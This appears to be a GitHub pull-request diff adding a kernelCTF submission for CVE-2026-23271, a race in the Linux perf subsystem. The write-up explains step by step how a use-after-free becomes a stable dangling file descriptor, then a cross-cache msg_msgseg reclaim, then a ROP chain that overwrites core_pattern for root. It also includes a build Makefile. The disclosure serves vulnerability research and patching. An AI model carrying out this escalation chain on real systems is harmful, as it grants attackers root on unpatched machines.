Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
149 changes: 149 additions & 0 deletions pocs/linux/kernelctf/CVE-2026-23271_lts/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,149 @@
# Exploit

## Exploit Primitives

- **Vulnerable object**: `perf_event` (`perf_event_cache` slab, 0x520 bytes)
- **Primitive chain**: Race condition → time-limited UAF → stable UAF → cross-cache attack → reclaim with `msg_msgseg` → fake `perf_event` with controlled `destroy` pointer → stack pivot → ROP `core_pattern` overwrite

## Vulnerability Overview

There is a race between `__perf_event_overflow()` and `perf_remove_from_context()`.

When a perf_event with `sigtrap=1` overflows, the kernel calls `task_work_add()` inside `__perf_event_overflow()` to schedule `perf_pending_task` for SIGTRAP delivery on return to userspace. If `perf_release()` runs concurrently on another thread and calls `_free_event()` → `call_rcu(free_event_rcu)` while the task_work is still queued, the `perf_event` is RCU-freed but the task_work still holds a reference to it. The subsequent `perf_pending_task` execution accesses the freed object, producing a UAF.

The kernel detects this as a WARNING at the `WARN_ON_ONCE(!atomic_long_inc_not_zero(&event->refcount))` check in `__perf_event_overflow()`, setting the taint bit — which the exploit uses as a reliable oracle to detect when the race has been won.

## Race Timing Diagram

Three threads cooperate to trigger, widen, and stabilize the race:

- **Thread 1 (Worker, CPU 0)**: Creates the tracepoint perf\_event A, triggers overflow via `futex_wait` syscall entry, then blocks in the futex to widen the race window.
- **Thread 2 (Closer, CPU 1)**: Closes the perf\_event fd to free event A via RCU, then detects the WARN and opens the spray gate.
- **Thread 3 (Spray, CPU 0)**: Heap-sprays event B into event A's freed slot before `perf_pending_task` runs.

```
Thread 1 (Worker, CPU 0) Thread 2 (Closer, CPU 1) Thread 3 (Spray, CPU 0)
======================== ========================= ========================

[1] perf_event_open(type=TRACEPOINT,
config=577 /* sys_enter_futex */,
sigtrap=1, sample_period=1)
[a] close(perf_event_fd)
[2] futex_wait(&futex_word, 0) |
(futex_word is a userspace global,
initially 0; expected_val=0)
| v
| (syscall entry) perf_event_release_kernel
v |
syscall_trace_enter |
perf_syscall_enter |
perf_trace_buf_submit |
perf_tp_event |
for_each_event: |
event A found on list ···> [b] perf_remove_from_context
(event A still on list (removes event A from list,
at this point) but Thread 1 already holds
a reference to it)
perf_swevent_event [c] put_event
(240-term filter atomic_long_dec_and_test
evaluation → refcount = 0
widens race window) |
__perf_event_overflow v
_free_event
[3] task_work_add(current, __free_event
&event->pending_task, call_rcu(&event->rcu_head,
TWA_RESUME) free_event_rcu)
WARN_ON_ONCE( |
!atomic_long_inc_not_zero( |
&event->refcount)) |
WARNING fires |
| [d] detect WARNING
| poll /proc/sys/kernel/tainted
| to check if taint bit set
|
v
do_futex → futex_wait_setup →
enters wait queue, calls schedule()
| [A] RCU grace period completes
| (free_event_rcu executes,
| event A returned to slab)
| spray: perf_event_open()
| → event B allocated in
| event A's freed slot
|
v
[5] futex_wait returns to userspace
resume_user_mode_work
task_work_run
perf_pending_task ← UAF
put_event(event)
'event' now points to event B
→ event B refcount decremented to 0
→ event B freed via RCU
→ userspace still holds FD to event B
→ DANGLING FD (stable, reusable UAF)
```

## Exploitation

### Race Constraints (all must hold for successful exploitation)

1. **Thread 1 `perf_tp_event` before Thread 2 `perf_remove_from_context`**: The tracepoint handler must find event A on the event list before the closer removes it.

2. **Thread 2 `put_event` before Thread 1 `WARN_ON_ONCE`**: Event A's refcount must reach 0 (via `put_event`) before `__perf_event_overflow` tries `atomic_long_inc_not_zero`. If refcount > 0, the increment succeeds silently and no UAF occurs. The 240-term filter expression widens this window by increasing `filter_match_preds` execution time.

3. **`free_event_rcu` before Thread 1 `perf_pending_task`**: Event A must be returned to the slab (via RCU callback) before `perf_pending_task` accesses it. The exploit ensures this by: (a) having the worker block in `futex_wait` to trigger an RCU quiescent state, and (b) calling `synchronize_rcu()` via `MEMBARRIER_CMD_GLOBAL`.

4. **Thread 3 spray before Thread 1 `perf_pending_task`**: Event B must occupy event A's freed slot before `perf_pending_task` runs `put_event`. The exploit achieves this by keeping the worker blocked in `futex_wait` until event B has completed, then waking it via `FUTEX_WAKE`.

### From Transient WARNING to Stable Dangling FD

The exploit converts a narrow, non-deterministic race into a stable UAF primitive in three stages:

1. **Transient race → WARNING**: The race between `__perf_event_overflow()` and `perf_remove_from_context()` is inherently narrow (~microseconds). The 240-term filter expression and `futex_wait` blocking widen it. When the race succeeds, the kernel fires a WARNING via `__warn()`, which calls `add_taint(TAINT_WARN)` after printk completes. The exploit detects this via `/proc/sys/kernel/tainted` polling or wake-failure heuristic.

2. **WARNING → Spray reclaim**: After detecting the race win, the exploit opens the spray gate. Multiple pre-created threads create new perf\_events to reclaim event A's freed slab slot. One of these (event B) occupies event A's slot.

3. **Spray reclaim → Dangling FD**: When `perf_pending_task` runs as task\_work on the worker's return to userspace, it calls `put_event(event)` on what it believes is event A — but the memory now belongs to event B. This decrements event B's refcount to 0, triggering `_free_event` on event B. However, the spray thread still holds an open FD to event B. This FD is now a **dangling pointer** — it references freed memory that can be reclaimed by arbitrary kernel objects (e.g., `msg_msgseg` via cross-cache attack), enabling controlled read/write and ultimately ROP.

### From Dangling FD to Controlled Memory

With the dangling FD for event B, the exploit converts it into attacker-controlled memory in three steps:

1. **Spray & locate victim**: Spray perf\_events (event B) to reclaim event A's freed slab slot, then probe with additional events (event C) one at a time. Each perf\_event has a unique kernel-assigned ID (monotonically increasing), readable via `ioctl(PERF_EVENT_IOC_ID)`. Before probing, the exploit records every event B FD's original ID. After each event C allocation, it re-reads all event B IDs — if a event B FD's ID has changed from its recorded value, it means event C landed in the same memory and overwrote that slot. This event B FD is now the `victim_perf_fd`.
2. **Cross-cache attack**: Free all perf\_events in the victim's slab region, flush them from the SLUB `cpu_partial` list, and return the empty slab pages to the buddy system.
3. **`msg_msgseg` reclaim**: Spray `msg_msgseg` objects (via `msgsnd`) to reclaim the freed buddy pages. The `victim_perf_fd` now points to attacker-controlled `msg_msgseg` memory.

### ID Oracle (Victim Identification)

The exploit needs to determine which `msg_msgseg` overlaps the freed `perf_event` and at what offset. It uses a two-stage approach:

**Stage 1 — Probe payload**: Each `msg_msgseg` is filled with a unique stamp pattern: `(msg_idx << 32) | buffer_offset` at every 8-byte position. Critical fields (`ctx`, `parent`) are patched to valid values (`core_pattern` address, 0) to prevent kernel crashes if a close happens on the reclaimed event.

**Stage 2 — Oracle read**: The exploit calls `ioctl(PERF_EVENT_IOC_ID)` on `victim_perf_fd`. Since the underlying memory is now a `msg_msgseg`, the `event->id` field contains the stamp pattern. From this, the exploit extracts:
- The victim `msg_queue_ids` index (`id_val >> 32`)
- The exact byte offset of the event within the segment (`id_val & 0xFFFFFFFF`)

### ROP and Privilege Escalation

With the victim segment and offset known, the exploit builds a fake `perf_event` payload with safety fields (NULL out `ctx`, `rb`, `prog`, `cgrp`, `addr_filters` to skip cleanup paths; set `refcount=1` so `_free_event` triggers) and a `destroy` pointer set to a stack pivot gadget (`push rbx; pop rsp; pop rbp; ret`). The ROP chain at event+0x8 calls `_copy_from_user` to overwrite the kernel's `core_pattern` with `|/proc/%P/fd/666 %P`, then calls `msleep` to freeze the kernel thread.

Since a `perf_event` (0x520 bytes) is larger than a single `msg_msgseg` (0x400 bytes), the fake event payload inevitably spans two adjacent segments. The exploit handles this by spraying a "universal neighbor payload" into segments adjacent to the victim (window +/-16), overlaying both prev-segment and next-segment positions so the payload is valid regardless of which neighbor contains the other half. The victim segment itself is then sprayed with the exact-offset payload. Closing `victim_perf_fd` triggers `perf_release()` → `_free_event()` → `event->destroy(event)` → stack pivot → ROP chain execution.

A previously forked child process polls `/proc/sys/kernel/core_pattern`. Once overwritten, it crashes via NULL dereference, causing the kernel to execute the exploit binary as root (via fd 666 `memfd`). The binary uses `pidfd_open` + `pidfd_getfd` to steal the parent's stdio FDs and runs `cat /flag`.

### KASLR Leak (Prefetch Side-Channel)

To bypass KASLR we refer to this [technique](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-6817_mitigation/docs/exploit.md#kaslr-bypass).

In the CI environment, `leak_kaslr_base` from libxdk is used. For manual testing on remote VMs, a separate Intel-optimized variant (`bypass_kaslr`) is selected.

## kernelXDK Integration

The exploit uses [kernelXDK](https://github.com/google/kernel-research) (libxdk) to decouple target-specific information from the exploit logic:

- **Target detection**: `TargetDb` + `AutoDetectTarget()` identifies the running kernel
- **Symbol resolution**: `GetSymbolOffset()` for `msleep`, `_copy_from_user`, `core_pattern`, and ROP gadgets
- **Structure offsets**: `GetFieldOffset()` for `perf_event` fields (`destroy`, `ctx`, `rb`, `pmu`, `refcount`, etc.)
- **ROP chain construction**: `RopChain::Add()` with KASLR-adjusted addresses
- **KASLR bypass**: `leak_kaslr_base()` for CI environments
30 changes: 30 additions & 0 deletions pocs/linux/kernelctf/CVE-2026-23271_lts/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
# Vulneribility

There is a race between `__perf_event_overflow()` and `perf_remove_from_context()`.

For software/tracepoint-driven perf events, overflow handling could run with only
preemption disabled (not hard IRQ disabled). In that context, teardown paths such as
`perf_event_release_kernel()` -> `perf_remove_from_context()` could make progress
concurrently and invalidate callback-related event state still used by the overflow path
(for example `event->pending_task`), leading to use-after-free.


## Requirements to trigger the vulnerability
- Capabilities: None
- Kernel configuration: `CONFIG_PERF_EVENTS=y`
- User namespaces required: No

## Commit which introduced the vulnerability
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=592903cdcbf6

## Commit which fixed the vulnerability
- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c9bc1753b3cc41d0e01fbca7f035258b5f4db0ae

## Affected kernel versions
- 2.6.31-rc1 - 7.0-rc2

## Affected component, subsystem
- perf

## Cause
- race condition
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
KERNELXDK_INCLUDE_DIR ?= /usr/local/include
KERNELXDK_LIB_DIR ?= /usr/lib

CXXFLAGS = -O2 -Wall -static -pthread -I. -I$(KERNELXDK_INCLUDE_DIR)
LDFLAGS = -L$(KERNELXDK_LIB_DIR) -lkernelXDK

exploit: exploit.cpp target_db.kxdb
g++ $(CXXFLAGS) -o $@ $< $(LDFLAGS)

target_db.kxdb:
wget -O target_db.kxdb https://storage.googleapis.com/kernelxdk/db/kernelctf.kxdb

clean:
rm -f exploit exploit_debug target_db.kxdb

.PHONY: clean
Binary file not shown.
Loading
Loading